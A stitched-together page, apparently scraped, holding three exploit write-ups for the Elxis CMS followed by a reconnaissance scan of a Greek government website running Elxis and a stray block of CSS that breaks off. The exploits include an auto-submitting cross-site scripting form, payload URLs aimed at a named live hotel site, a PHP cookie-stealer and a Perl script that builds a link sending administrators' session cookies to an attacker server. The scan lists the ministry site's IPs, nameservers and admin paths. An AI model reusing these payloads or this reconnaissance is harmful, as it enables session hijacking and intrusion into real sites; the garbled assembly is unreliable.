- Vendor: Elxis Team ( http://www.elxis.org/ )
- Vulnerable Version: 2009.2 electra rev2631 and probably prior versions
- Vendor Notification: 20 September 2010
- Vulnerability Type: XSS (Cross Site Scripting)
- Status: Fixed by Vendor
- Risk level: Medium
- Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
- Vulnerability Details:
- User can execute arbitrary JavaScript code within the vulnerable application.
- The vulnerability exists due to failure in the "administrator/components/com_modules/admin.modules.php" script to properly sanitize user-supplied input in "title" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
- An attacker can use browser to exploit this vulnerability. The following PoC is available:
- <form action="http://host/administrator/index2.php" method="post" name="main" >
- <input type="hidden" name="title" value='Polls"><script>alert(document.cookie)</script>' />
- <input type="hidden" name="showtitle" value="1" />
- <input type="hidden" name="position" value="right" />
- <input type="hidden" name="languages[]" value="" />
- <input type="hidden" name="access" value="29" />
- <input type="hidden" name="published" value="1" />
- <input type="hidden" name="params[cache]" value="0" />
- <input type="hidden" name="params[moduleclass_sfx]" value="" />
- <input type="hidden" name="selections[]" value="0" />
- <input type="hidden" name="option" value="com_modules" />
- <input type="hidden" name="id" value="1" />
- <input type="hidden" name="original" value="1" />
- <input type="hidden" name="module" value="mod_poll" />
- <input type="hidden" name="task" value="save" />
- <input type="hidden" name="client_id" value="0" />
- </form>
- <script>
- document.main.submit();
- </script>
- Solution: Upgrade to the most recent version
- Elxis CMS version 2009.2 electra rev2631 suffers from SQL injection and cross site scripting vulnerabilities.
- swappie aka faithlove/elxis-xss.txt ( na)
- ?
- ################################################################
- # .___ __ _______ .___ #
- # __| _/____ _______| | __ ____ \ _ \ __| _/____ #
- # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
- # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
- # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
- # \/ \/ \/ #
- # ___________ ______ _ __ #
- # _/ ___\_ __ \_/ __ \ \/ \/ / #
- # \ \___| | \/\ ___/\ / #
- # \___ >__| \___ >\/\_/ #
- # est.2007 \/ \/ forum.darkc0de.com #
- ################################################################
- ################################################################
- # Greetings to --d3hydr8 -r45c4l -baltazar -sinner_01 #
- # -C1c4Tr1Z -Gabitzu and all darkc0de members #
- ;###############################################################
- #
- # Author: swappie [aka] faithlove
- #
- # Home : www.darkc0de.com
- #
- # Email : swappieakafaithlove@gmail.com
- #
- # Do researching and share!
- #
- ;###############################################################
- #
- # Title: Elxis 2008.1 Nemesis
- #
- # Issue Date: Monday, 29 September 2008
- #
- # CMS Link: http://www.elxis-downloads.com/fserver/96.html
- # Vendor: http://www.elxis.org/
- #
- #
- ;###############################################################
- #
- # Dork: I'm sure you can figure that by yourself, right?
- #
- #################################################################
- ----------
- XSS Vulns;
- ----------
- http://www.site.com/?>'"><script>alert("XSS Vuln")</script>
- http://www.site.com/index.php/>"><script>alert("XSS Vuln")</script>
- http://www.site.com/index.php?option=>"><script>alert("XSS Vuln")</script>
- http://www.site.com/index.php?option=com_poll&Itemid=>"><script>alert("XSS Vuln")</script>
- http://www.site.com/index.php?option=com_poll&task=view&id=>"><script>alert("XSS Vuln")</script>
- http://www.site.com/index.php?option=com_poll&Itemid=1&task=>"><script>alert("XSS Vuln")</script>
- http://www.site.com/index.php?option=com_poll&task=view&bid=>"><script>alert("XSS Vuln")</script>
- http://www.site.com/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"><script>alert("XSS Vuln")</script>
- ----------
- Live Demo;
- ----------
- http://www.hotelsinalbania.net/?>'"><script>alert("XSS Vuln")</script>
- http://www.hotelsinalbania.net/index.php/>"><script>alert("XSS Vuln")</script>
- http://www.hotelsinalbania.net/index.php?option=>"><script>alert("XSS Vuln")</script>
- http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=>"><script>alert("XSS Vuln")</script>
- http://www.hotelsinalbania.net/index.php?option=com_poll&task=view&id=>"><script>alert("XSS Vuln")</script>
- http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=1&task=>"><script>alert("XSS Vuln")</script>
- http://www.hotelsinalbania.net/index.php?option=com_poll&task=view&bid=>"><script>alert("XSS Vuln")</script>
- http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"><script>alert("XSS Vuln")</script>
- ;==================================================================;
- ;==================================================================;
- -----------------
- Session Fixation;
- -----------------
- http://www.site.com/?PHPSESSID=[session_fixation]
- Explanation:
- The user's session ID could be fixed by the attacker before the user
- even logs on the target server so it wouldn't be needed to get the session
- ID afterwards.
- How to fix the "session fixation" ?
- There is a simple way to do it.
- Step 1.
- Open the file named php.ini from your server.
- Step 2.
- Look through the file for the following lines:
- ; This option enables administrators to make their users invulnerable to
- ; attacks which involve passing session ids in URLs; defaults to 0.
- ; session.use_only_cookies = 1 !![PLEASE NOTE THE ";"]!!
- Step 3.
- => [ and make it look like this: ]
- ; This option enables administrators to make their users invulnerable to
- ; attacks which involve passing session ids in URLs; defaults to 0.
- session.use_only_cookies = 1
- Step 4.
- Restart the web server, php, whatever.
- Cheers,
- swappie [aka] faithlove
- Elxis 2008.1 Nemesis suffers from multiple cross site scripting vulnerabilities.
- mr.pr0n/Elxis 2009.3 Aphrodite Rev 2681 Session Hijacking / XSS ( na)
- ?
- #####################################################################################
- # Exploit Title: Elxis 2009.3 Aphrodite rev2681 - Session hijacking Vulnerability
- # Google Dork: --
- # Date: 25/8/2011
- # Author: mr.pr0n (@_pr0n_)
- # Homepage: http://ghostinthelab.wordpress.com/ - http://s3cure.gr
- # Software Link: http://www.elxis-downloads.com/downloads/download.html?id=325
- # Version: Elxis 2009.3 Aphrodite rev2681
- # Tested on: Linux Fedora 14
- #####################################################################################
- ================
- | Description |
- ================
- Elxis is powerful open source content management system (CMS) released for free under the GNU/GPL license. It has unique multi-lingual features, it follows W3C standards, it is secure, flexible, easy to use, and modern. The development team, Elxis Team, paid extra attention to the optimization of the CMS for the search engines and this lead to high performance of all elxis powered web sites and to high ranking in search engines results. We are glad to introduce you to the Elxis world. Welcome!
- ===============================
- | 0x01 | XSS Vulnerabilites |
- ===============================
- ------------------------------------
- | FrontPage Manager: (com_content) |
- ------------------------------------
- http://VICTIM_SERVER/elxis/administrator/index2.php?search=%27%22%3E%3Cmarquee%3E%3Ch1%3EXSS+Vulnerability%3C%2Fh1%3E%3C%2Fmarquee%3E&filter_sectionid=0&catid=0&limit=20&limitstart=0&option=com_frontpage&task=&boxchecked=0&simpleview=1
- ------------------------------------------
- | Content Items Manager: (com_frontpage) |
- ------------------------------------------
- http://VICTIM_SERVER/elxis/administrator/index2.php?search=%27%22%3E%3Cmarquee%3E%3Ch1%3EXSS+Vulnerability%3C%2Fh1%3E%3C%2Fmarquee%3E&filter_pub=-3&filter_sectionid=0&catid=0&limit=20&limitstart=0&option=com_content&sectionid=0&task=&boxchecked=0&hidemainmenu=0&redirect=0&simpleview=1
- ------------------------------------
- | Private Messages: (com_messages) |
- ------------------------------------
- http://VICTIM_SERVER/elxis/administrator/index2.php?search=%27%22%3E%3Cmarquee%3E%3Ch1%3EXSS+Vulnerability%3C%2Fh1%3E%3C%2Fmarquee%3E&limit=20&limitstart=0&option=com_messages&task=&boxchecked=0&hidemainmenu=0
- ------------------------------
- | Menus Manager: (com_menus) |
- ------------------------------
- http://VICTIM_SERVER/elxis/administrator/index2.php?levellimit=1&search=%27%22%3E%3Cmarquee%3E%3Ch1%3EXSS+Vulnerability%3C%2Fh1%3E%3C%2Fmarquee%3E&order%5B%5D=1&access=29&order%5B%5D=1&access=29&order%5B%5D=3&access=29&order%5B%5D=1&access=29&order%5B%5D=2&access=29&order%5B%5D=3&access=29&order%5B%5D=3&access=29&order%5B%5D=1&access=29&order%5B%5D=2&access=29&order%5B%5D=3&access=29&order%5B%5D=5&access=29&order%5B%5D=5&access=29&order%5B%5D=7&access=29&order%5B%5D=7&access=29&order%5B%5D=9&access=29&order%5B%5D=10&access=29&order%5B%5D=10&access=29&order%5B%5D=12&access=29&order%5B%5D=12&access=29&limit=20&limitstart=0&option=com_menus&menutype=mainmenu&task=&boxchecked=0&hidemainmenu=0
- ===========================================
- | 0x02 | Session hijacking Vulnerability |
- ===========================================
- ------------
- | Intro... |
- ------------
- The Session Hijacking attack consists of the exploitation of the web session control mechanism, which is normally managed for a session token.
- Because http communication uses many different TCP connections, the web server needs a method to recognize every user’s connections. The most useful method depends on a token that the Web Server sends to the client browser after a successful client authentication. A session token is normally composed of a string of variable width and it could be used in different ways, like in the URL, in the header of the http requisition as a cookie, in other parts of the header of the http request, or yet in the body of the http requisition.
- The Session Hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server.
- The session token could be compromised in different ways; the most common are:
- [*] Predictable session token;
- [*] Session Sniffing;
- [*] Client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc);
- [*] Man-in-the-middle attack
- [*] Man-in-the-browser attack
- Source:
- https://www.owasp.org/index.php/Session_hijacking_attack
- -----------------
- | The 1st Step |
- -----------------
- Upload to the ATTACKER_SERVER:
- [*] stealer.php - [Record the cookies of every user that views it!]
- [*] gotit.txt - [The log file!]
- //--- stealer.php ---
- <?php
- header ('Location:http://VICTIM_SERVER/elxis/administrator/index2.php');
- $cookie = $_GET['cookie'];
- $log = fopen("gotit.txt", "a");
- fwrite($log, $cookie ."\n");
- fclose($log);
- ?>
- //--- end ---
- -----------------
- | The 2nd Step |
- -----------------
- Create the "evil" link (with the Elxis_2009.3_Aphrodite_rev2681.pl).
- # --- Elxis_2009.3_Aphrodite_rev2681.pl ---
- #!/usr/bin/perl
- print "\n |==[ mr.pr0n ]=============================================== |\n";
- print " | Elxis 2009.3 Aphrodite rev2681 - ..the evil link creator |\n";
- print " |===================[ http://ghostinthelab.wordpress.com/ ]== |\n";
- print "\nEnter the target (e.g.: http://victim.com)";
- print "\n> ";
- $target=<STDIN>;
- chomp($target);
- $target = "http://".$target if ($target !~ /^http:/);
- print "Enter the elxis directory (e.g.: elxis)";
- print "\n> ";
- $dir=<STDIN>;
- chomp($dir);
- $target = $target."/".$dir;
- print "Enter the address of the \"stealer.php\" (e.g.: http://attacker.com/directory/stealer.php)";
- print "\n> ";
- $stealer=<STDIN>;
- chomp($stealer);
- $result = "document.location=\"$stealer?cookie=\"+document.cookie\;";
- $result =~ s/(.)/sprintf("%x%",ord($1))/eg;
- print "\n[+] Send this link to your victim...\n\n";
- print $target."/administrator/index2.php?option=com_frontpage&search='\"><%73%63%72%69%70%74>%".$result."3b<%2F%73%63%72%69%70%74>\n";
- #--- end ---
- ----------------
- | The 3rd Step |
- ----------------
- Send the "evil" link to the administrator....
- WARNING: The administrator *MUST* be logged in. |
- ----------------
- | The 4th Step |
- ----------------
- Go to http://VICTIM_SERVER/elxis/administrator/
- Insert into your cookie the hijacked session.
- Go to http://VICTIM_SERVER/elxis/administrator/index2.php
- ...Welcome administrator :-)
- ----------------------------------------------------------------
- | See the Demo | http://blip.tv/play/AYLPjzUC |
- ----------------------------------------------------------------
- The certificate is self-signed. Users will receive a warning when accessing this site unless the certificate is manually added as a trusted certificate to their web browser. You can fix this error by buying a trusted SSL certificate
- Common name: *.mfa.gr
- Organization: MFA - Association of Hellenic Internet Users (EEXI)
- Location: Athens, Attica, GR
- Valid from November 12, 2007 to November 9, 2017
- Serial Number: f13eea99512e0038
- Signature Algorithm: sha1WithRSAEncryption
- Issuer: *.mfa.gr
- 2 sites hosted on IP Address 84.205.251.33
- ID Domain Site Link
- 1 www1.mfa.gr www1.mfa.gr
- 2 mfa.gr mfa.gr
- User-agent: *
- Disallow: /administrator/
- Disallow: /bridges/
- Disallow: /cache/
- Disallow: /editor/
- Disallow: /includes/
- Disallow: /installation/
- ↑ Top
- Scan for: http://www.mfa.gr/
- Hostname: www.mfa.gr
- IP address: 84.205.251.33
- System Details:
- Running on: Apache/2.2.17
- System info: (Debian)
- Powered by: PHP/5.3.3-7
- Web application details:
- Application: Elxis - Copyright (C) 2006-2012 Elxis.org. All rights reserved.
- Domain NS records Nameserver records returned by the parent servers are:
- ns2.otenet.gr. ['195.170.2.1'] [TTL=10800]
- dnsa.mfa.gr. ['195.167.30.162'] [TTL=10800]
- ns1.otenet.gr. ['195.170.0.2'] (NO GLUE) [TTL=10800]
- http://dnsa.mfa.gr/
- http://www.mfa.gr/administrator/includes/js/ajax_new.js
- http://www.mfa.gr/includes/js/elxis.js
- http://www.mfa.gr/modules/mod_sonofsucker_h/sonofsucker.js
- http://www.mfa.gr/templates/mfa_gov_gr/js/roundies-compressed.js
- http://www.mfa.gr/templates/mfa_gov_gr/js/scrollpage.js
- http://www.mfa.gr/modules/mod_contentfader/js/jquery.min.js
- http://www.mfa.gr/modules/mod_contentfader/js/ui.core.js
- http://www.mfa.gr/modules/mod_contentfader/js/ui.tabs.js
- http://www.mfa.gr/modules/mod_flash/swfobject.js
- http://www.mfa.gr/
- http://www.mfa.gr/en/
- http://www.mfa.gr/fr/
- http://www.mfa.gr/to-ypourgeio/
- http://www.mfa.gr/igesia/
- http://www.mfa.gr/igesia/ypourgos/o-ypourgos.html
- http://www.mfa.gr/igesia/yfypourgoi/
- http://www.mfa.gr/igesia/genikoi-grammateis/o-genikos-grammateas.html
- http://www.mfa.gr/igesia/genikoi-grammateis/genikos-grammateas-dos-as.html
- http://www.mfa.gr/igesia/genikoi-grammateis/eidike-grammateas-axiopoieses-diethnon-programmaton.html
- http://www.mfa.gr/domi.html
- http://www.mfa.gr/to-ypourgeio/domi/apostoli-kai-armodiotites.html
- http://www.mfa.gr/to-ypourgeio/stelehosi-ypex/
- http://www.mfa.gr/to-ypourgeio/domi/monada-diaheirisis-kriseon.html
- http://www.mfa.gr/to-ypourgeio/diplomatiki-akademia/
- http://www.mfa.gr/to-ypourgeio/domi/ydas.html
- http://www.mfa.gr/diplomatiko-kai-istoriko-arheio/
- http://www.mfa.gr/to-ypourgeio/domi/kas.html
- http://www.mfa.gr/to-ypourgeio/domi/grafeio-proothisis-ellinikon-ypopsifiotiton-se-diethneis-kai-yperethnikous-organismous.html
- http://www.mfa.gr/epopteuomenoi-organismoi/
- http://www.mfa.gr/to-ypourgeio/istoria/oi-egkatastaseis-tou-ypourgeiou-exoterikon.html
- http://www.mfa.gr/to-ypourgeio/diethneis-symvaseis/
- http://www.mfa.gr/organismos-ypex/
- http://www.mfa.gr/exoteriki-politiki/
- http://www.mfa.gr/dimereis-sheseis-tis-ellados.html
- http://www.mfa.gr/eidika-themata-exoterikis-politikis/
- http://www.mfa.gr/zitimata-ellinotourkikon-sheseon/
- http://www.mfa.gr/kypriako/
- http://www.mfa.gr/to-zitima-tou-onomatos-tis-pgdm/
- http://www.mfa.gr/exoteriki-politiki/periferiaki-politiki/
- http://www.mfa.gr/exoteriki-politiki/periferiaki-politiki/dytika-valkania.html
- http://www.mfa.gr/exoteriki-politiki/periferiaki-politiki/mesogeios.html
- http://www.mfa.gr/exoteriki-politiki/periferiaki-politiki/mesi-anatoli.html
- http://www.mfa.gr/exoteriki-politiki/periferiaki-politiki/eyxeinos-pontos.html
- http://www.mfa.gr/exoteriki-politiki/i-ellada-stin-ee/
- http://www.mfa.gr/exoteriki-politiki/i-ellada-stous-diethneis-organismous/
- http://www.mfa.gr/exoteriki-politiki/pagkosmia-zitimata/
- http://www.mfa.gr/vouli-kai-exoteriki-politiki/
- http://www.mfa.gr/omilies/
- http://www.mfa.gr/koinovouleutikos-eleghos/
- http://www.mfa.gr/exoteriki-politiki/ethniko-symvoulio-exoterikis-politikis/
- http://www.mfa.gr/epikairotita/
- http://www.mfa.gr/epikairotita/eidiseis-anakoinoseis/
- http://www.mfa.gr/epikairotita/proto-thema/
- http://www.mfa.gr/epikairotita/enimerosi-syntakton/
- http://www.mfa.gr/epikairotita/diloseis-omilies/
- http://www.mfa.gr/polymesa/
- http://www.mfa.gr/polymesa/video/video-ypex.html
- http://www.mfa.gr/polymesa/photographies/
- http://www.mfa.gr/polymesa/ihitika/
- http://www.mfa.gr/arheio-epikairotitas.html
- http://www.mfa.gr/ypiresies/
- http://www.mfa.gr/ypiresies-gia-ton-politi/
- http://www.mfa.gr/kep-politon-kai-apodimon-ellinon.html
- http://www.mfa.gr/ypiresies-gia-ton-politi/metafrastiki-ypiresia/i-metaphrastiki-ypiresia.html
- http://www.mfa.gr/ypiresies-gia-ton-politi/dioikitikes-ypotheseis/
- http://www.mfa.gr/ypiresies-gia-ton-politi/dikastikes-ypotheseis/
- http://www.mfa.gr/ypiresies-gia-ton-politi/naytiliakes-ypotheseis/
- http://www.mfa.gr/proxeniki-syndromi.html
- http://www.mfa.gr/theoriseis-eisodou-visas/
- http://www.mfa.gr/theoriseis-eisodou-visas/eidi-theoriseon/ethnikes-theoriseis.html
- http://www.mfa.gr/theoriseis-eisodou-visas/theoriseis-schengen/
- http://www.mfa.gr/theoriseis-eisodou-visas/theoriseis-gia-allodapous-pou-taxidevoun-stin-ellada/
- http://www.mfa.gr/theoriseis-eisodou-visas/theoriseis-gia-ellines-pou-taxidevoun-sto-exoteriko/
- http://www.mfa.gr/ypiresies-gia-epiheiriseis/
- http://www.mfa.gr/ypiresies-gia-epiheiriseis/ypiresies-gia-exostrefeis-epiheiriseis/
- http://www.mfa.gr/ypiresies-gia-epiheiriseis/dimosioi-diagonismoi-diavouleyseis/
- http://www.mfa.gr/eykairies-stadiodromias/
- http://www.mfa.gr/dinatotites-epaggelmatikis-stadiodromias-sto-ypex/
- http://www.mfa.gr/eykairies-stadiodromias/epaggelmatiki-stadiodromia-se-diethneis-organismous/
- http://www.mfa.gr/prokirixeis-theseon-dep/
- http://www.mfa.gr/ethelontismos.html
- http://www.mfa.gr/contact/mfa-el-contacts/ypourgeio-exoterikon.html
- http://www.mfa.gr/katalogos.html
- appendix/dimereis-sheseis-tis-ellados/alpha.html
- http://www.mfa.gr/xenes-arhes-stin-ellada.html
- epikairotita/proto-thema/sunantese-upeks-abramopoulou-me-presbeis-arabikon-khoron-2.html
- epikairotita/proto-thema/deloseis-upeks-abramopoulou-kai-upeks-mexikou-pe-candellano-meta-te-sunantese-tous.html
- epikairotita/proto-thema/deloseis-upeks-abramopoulou-kai-upourgou-tourismou-kephalogianne.html
- epikairotita/proto-thema/sunantese-upeks-abramopoulou-me-upourgo-europaikon-upotheseon-kai-exoterikou-emporiou-tes-phinlandias-stubb.html
- http://www.mfa.gr/epikairotita/eidiseis-anakoinoseis/epikoinonia-tou-upeks-abramopoulou-me-to-neo-eidiko-entetalmeno-tes-ee-gia-ta-anthropina-dikaiomata-st-lamprinide.html
- http://www.mfa.gr/epikairotita/diloseis-omilies/apantese-tou-ekprosopou-upeks-se-eroteseis-skhetika-me-anakoinothen-grapheiou-prothupourgou-pgdm.html
- http://www.mfa.gr/epikairotita/eidiseis-anakoinoseis/anakoinose-gia-pragmatopoietheisa-sunantese-upeks-abramopoulou-me-presbe-serbias.html
- http://www.mfa.gr/epikairotita/eidiseis-anakoinoseis/anakoinose-gia-pragmatopoietheisa-sunantese-upeks-abramopoulou-me-presbe-israel.html
- http://www.mfa.gr/epikairotita/eidiseis-anakoinoseis/sunantese-ellena-diapragmateute-gia-to-thema-tes-onomasias-tes-pgdm-presbe-ad-basilake-me-prosopiko-apestalmeno-ggee-nimetz.html
- http://www.mfa.gr/epikairotita/eidiseis-anakoinoseis/summetokhe-uphupeks-kourkoula-se-sumboulia-exoterikon-upotheseon-kai-genikon-upotheseon-2.html
- eykairies-stadiodromias/
- ypiresies-gia-ton-politi/
- ypiresies-gia-epiheiriseis/ypiresies-gia-exostrefeis-epiheiriseis/
- theoriseis-eisodou-visas/
- stoiheia-epikoinonias.html
- proxeniki-syndromi.html
- ypiresies-gia-epiheiriseis/dimosioi-diagonismoi-diavouleyseis/
- http://www.facebook.com/mfa.gr
- http://www.mfa.gr/rss/rss20.xml
- http://www.mfa.gr/sitemap/
- http://www.mfa.gr/search.html
- http://www.mfa.gr/oroi-hrisis.html
- http://www.mfa.gr/links/diadiktiakoi-topoi-ypex/
- gr-us.ics.forth.gr was kind enough to give us that information.
- Pass TLD Parent Check Good. gr-us.ics.forth.gr, the parent server I interrogated, has information for your TLD. This is a good thing as there are some other domain extensions like "co.us" for example that are missing a direct check.
- Pass Your nameservers are listed Good. The parent server gr-us.ics.forth.gr has your nameservers listed. This is a must if you want to be found as anyone that does not know your DNS servers will first ask the parent nameservers.
- Info DNS Parent sent Glue The parent nameserver gr-us.ics.forth.gr is not sending out GLUE for every nameservers listed, meaning he is sending out your nameservers host names without sending the A records of those nameservers. It's ok but you have to know that this will require an extra A lookup that can delay a little the connections to your site. This happens a lot if you have nameservers on different TLD (domain.com for example with nameserver ns.domain.org.)
- Pass Nameservers A records Good. Every nameserver listed has A records. This is a must if you want to be found.
- NS Info NS records from your nameservers NS records got from your nameservers listed at the parent NS are:
- ns1.otenet.gr ['195.170.0.2'] [TTL=21600]
- dnsa.mfa.gr ['195.167.30.162'] [TTL=21600]
- ns2.otenet.gr ['195.170.2.1'] [TTL=21600]
- Pass Recursive Queries Good. Your nameservers (the ones reported by the parent server) do not report that they allow recursive queries for anyone.
- Pass Same Glue The A records (the GLUE) got from the parent zone check are the same as the ones got from your nameservers. You have to make sure your parent server has the same NS records for your zone as you do according to the RFC. This tests only nameservers that are common at the parent and at your nameservers. If there are any missing or stealth nameservers you should see them below!
- Information Glue for NS records INFO: GLUE was not sent when I asked your nameservers for your NS records.This is ok but you should know that in this case an extra A record lookup is required in order to get the IPs of your NS records. The nameservers without glue are:
- 195.167.30.162
- You can fix this for example by adding A records to your nameservers for the zones listed above.
- Pass Mismatched NS records OK. The NS records at all your nameservers are identical.
- Pass DNS servers responded Good. All nameservers listed at the parent server responded.
- Pass Name of nameservers are valid OK. All of the NS records that your nameservers report seem valid.
- Pass Multiple Nameservers Good. You have multiple nameservers. According to RFC2182 section 5 you must have at least 3 nameservers, and no more than 7. Having 2 nameservers is also ok by me.
- Pass Nameservers are lame OK. All the nameservers listed at the parent servers answer authoritatively for your domain.
- Pass Missing nameservers reported by parent OK. All NS records are the same at the parent and at your nameservers.
- Pass Missing nameservers reported by your nameservers OK. All nameservers returned by the parent server gr-us.ics.forth.gr are the same as the ones reported by your nameservers.
- Pass Domain CNAMEs OK. RFC1912 2.4 and RFC2181 10.3 state that there should be no CNAMEs if an NS (or any other) record is present.
- Pass NSs CNAME check OK. RFC1912 2.4 and RFC2181 10.3 state that there should be no CNAMEs if an NS (or any other) record is present.
- Pass Different subnets OK. Looks like you have nameservers on different subnets!
- Pass IPs of nameservers are public Ok. Looks like the IP addresses of your nameservers are public. This is a good thing because it will prevent DNS delays and other problems like
- Pass DNS servers allow TCP connection OK. Seems all your DNS servers allow TCP connections. This is a good thing and useful even if UDP connections are used by default.
- Pass Different autonomous systems OK. It seems you are safe from a single point of failure. You must be careful about this and try to have nameservers on different locations as it can prevent a lot of problems if one nameserver goes down.
- Pass Stealth NS records sent Ok. No stealth ns records are sent
- SOA Info SOA record The SOA record is:
- Primary nameserver: dnsa.mfa.gr
- Hostmaster E-mail address: internet.mfa.gr
- Serial #: 2012071900
- Refresh: 10800
- Retry: 3600
- Expire: 21600 6 hours
- Default TTL: 3600
- Pass NSs have same SOA serial OK. All your nameservers agree that your SOA serial number is 2012071900.
- Pass SOA MNAME entry OK. dnsa.mfa.gr That server is listed at the parent servers.
- Pass SOA Serial Your SOA serial number is: 2012071900. This appears to be in the recommended format of YYYYMMDDnn.
- Pass SOA REFRESH OK. Your SOA REFRESH interval is: 10800. That is OK
- Pass SOA RETRY Your SOA RETRY value is: 3600. Looks ok
- Warn SOA EXPIRE Your SOA EXPIRE number is: 21600. That is NOT OK
- Pass SOA MINIMUM TTL Your SOA MINIMUM TTL is: 3600. This value was used to serve as a default TTL for records without a given TTL value and now is used for negative caching (indicates how long a resolver may cache the negative answer). RFC2308 recommends a value of 1-3 hours. Your value of 3600 is OK.
- MX Info MX Records Your MX records that were reported by your nameservers are:
- 10 mailhost.mfa.gr 84.205.251.31
- [These are all the MX records that I found. If there are some non common MX records at your nameservers you should see them below. ]
- Pass Different MX records at nameservers Good. Looks like all your nameservers have the same set of MX records. This tests to see if there are any MX records not reported by all your nameservers and also MX records that have the same hostname but different IPs
- Pass MX name validity Good. I did not detect any invalid hostnames for your MX records.
- Pass MX IPs are public OK. All of your MX records appear to use public IPs.
- Pass MX CNAME Check OK. No problems here.
- Pass MX A request returns CNAME OK. No CNAMEs returned for A records lookups.
- Pass MX is not IP OK. All of your MX records are host names.
- Info Number of MX records OK. Looks like you only have one MX record at your nameservers. You should be careful about what you are doing since you have a single point of failure that can lead to mail being lost if the server is down for a long time.
- Pass Mismatched MX A OK. I did not detect differing IPs for your MX records.
- Pass Duplicate MX A records OK. I have not found duplicate IP(s) for your MX records. This is a good thing.
- Pass Reverse MX A records (PTR) Your reverse (PTR) record:
- 31.251.205.84.in-addr.arpa -> mailhost.mfa.gr
- You have reverse (PTR) records for all your IPs, that is a good thing.
- WWW Info WWW A Record Your www.mfa.gr A record is:
- www.mfa.gr [84.205.251.33]
- Pass IPs are public OK. All of your WWW IPs appear to be public IPs.
- Pass WWW CNAME OK. No CNAME
- Validation Output: 2 Errors
- Error Line 2, Column 5: XML declaration allowed only at the start of the document
- <?xml version="1.0" encoding="UTF-8"?>
- ✉
- Error Line 635, Column 19: Entity 'copy' not defined
- Copyright © 2012 Ελληνική Δημοκρατία - Υπουργείο Εξωτερικών
- Download tests for mfa.gr:
- Downloads we found on this site:
- Download Analysis
- Microsoft Office Word Viewer 2003 (wdviewer.exe)
- CoffeeCup Free Viewer Plus (CoffeeFreeImageViewer.exe)
- Microsoft Office PowerPoint Viewer 2003 (ppviewer.exe)
- Microsoft Office Excel Viewer 2003 (xlviewer.exe)
- CoffeeFreeImageViewer.exe
- * {
- margin : 0;
- padding : 0;
- }
- h1, h2, h3, h4, h5, h6, p, blockquote, form, label, ul, ol, dl, fieldset, address {
- margin : 0.5em 0;
- }
- li, dd {
- margin-left : 1em;
- }
- fieldset {
- padding : 0.5em;
- }
- body {
- font-size : 76.1%;
- font-family : verdana, arial, helvetica, sans-serif;
- line-height : 1.3em;
- color : #000;
- background-color : #fff;
- }
- strong, b {
- font-weight : bold;
- }
- em, i {
- font-style : italic;
- }
- pre {
- font-family : monospace;
- }
- img {
- border : 0;
- }
- ol, ul, li {
- font-size : 1.0em;
- line-height : 1.3em;
- margin-top : 0.2em;
- margin-bottom : 0.1em;
- }
- p {
- font-size : 1.0em;
- line-height : 1.3em;
- margin : 1.2em 0 1.2em 0;
- }
- li > p {
- margin-top : 0.2em;
- }
- ul {
- margin-left : 0.5em;
- }
- li {
- list-style-type : none;
- }
- h1 {
- font-size : 2.0em;
- margin : 0.8em 0 0.8em 0;
- font-weight : normal;
- }
- h2 {
- font-size : 1.7em;
- margin : 0.8em 0 0.8em 0;
- font-weight : normal;
- }
- h3 {
- font-size : 1.4em;
- margin : 0.8em 0 0.8em 0;
- font-weight : normal;
- }
- h4 {
- font-size : 1.2em;
- margin : 0.8em 0 0.8em 0;
- font-weight : bold;
- }
- h5 {
- font-size : 1.0em;
- margin : 0.8em 0 0.8em 0;
- font-weight : bold;
- }
- h6 {
- font-size : 0.8em;
- margin : 0.8em 0 0.8em 0;
- font-weight : bold;
- }
- body.contentpane {
- text-align : left;
- }
- .clear {
- clear : both;
- }
- div.message {
- clear : both;
- background-color : #c3e5fc;
- border : #6899b8 dashed 1px;
- padding : 5px;
- margin : 5px;
- font-weight : bold;
- }
- .elxerror {
- clear : both;
- margin : 20px 0;
- background : url(../images/M_images/stop48.png) 50% 5px no-repeat #fdd5d5;
- padding : 5px 5px 5px 60px;
- border : #e1323c solid 1px;
- font-size : 1em;
- font-weight : bold;
- color : #990000;
- text-align : left;
- min-height : 60px;
- }
- .elxwarning {
- clear : both;
- margin : 20px 0;
- background : url(../images/M_images/warning48.png) 50% 5px no-repeat #fcf8ca;
- padding : 5px 5px 5px 60px;
- border : #febf62 solid 1px;
- font-size : 1em;
- font-weight : bold;
- color : #d58002;
- text-align : left;
- min-height : 60px;
- }
- .text_area, .inputbox, .selectbox {
- margin : 2px 0 2px 0;
- padding : 1px;
- }
- .userlogin {
- width : 100%;
- display : block;
- padding : 2px;
- position : relative;
- margin : 0;
- }
- .userlogin img {
- margin : 2px;
- padding : 2px;
- border : #666 solid 1px;
- float : left;
- }
- ul.table {
- list-style : none;
- padding : 1px 0;
- background : inherit;
- text-indent : 0;
- }
- ul.table li {
- padding : 2px;
- margin : 2px;
- text-indent : 0;
- clear : both;
- float : left;
- width : 98%;
- }
- img.screenshot {
- border : 0;
- float : left;
- padding : 2px 5px 2px 2px;
- }
- ul.table li.row0, ul.table li.sectiontableentry1 {
- background-color : #eeeeee;
- }
- ul.table li.row1, ul.table li.sectiontableentry2 {
- background-color : #f9f9f0;
- }
- .business-card {
- background-color : #f5f5f5;
- padding : 5px;
- margin : 5px;
- float : left;
- width : 96%;
- border : silver solid 1px;
- }
- .business-card img.card {
- padding : 2px;
- margin : 2px;
- border : silver solid 1px;
- }
- dl.card-info {
- margin : 0;
- padding : 0;
- }
- dl.card-info dt {
- font-weight : bold;
- font-size : 1.2em;
- color : #444;
- margin : 0;
- padding : 0;
- }
- dl.card-info dd {
- margin : 0;
- font-size : 0.925em;
- }
- dl.card-info img {
- vertical-align : top;
- border : 0;
- margin : 1px;
- }
- .small {
- font-size : 0.75em;
- }
- .avatarbox {
- display : block;
- position : relative;
- float : left;
- background-color : #eeeeee;
- border : #999999 solid 1px;
- color : #000000;
- font-size : 0.9em;
- margin : 2px;
- padding : 2px;
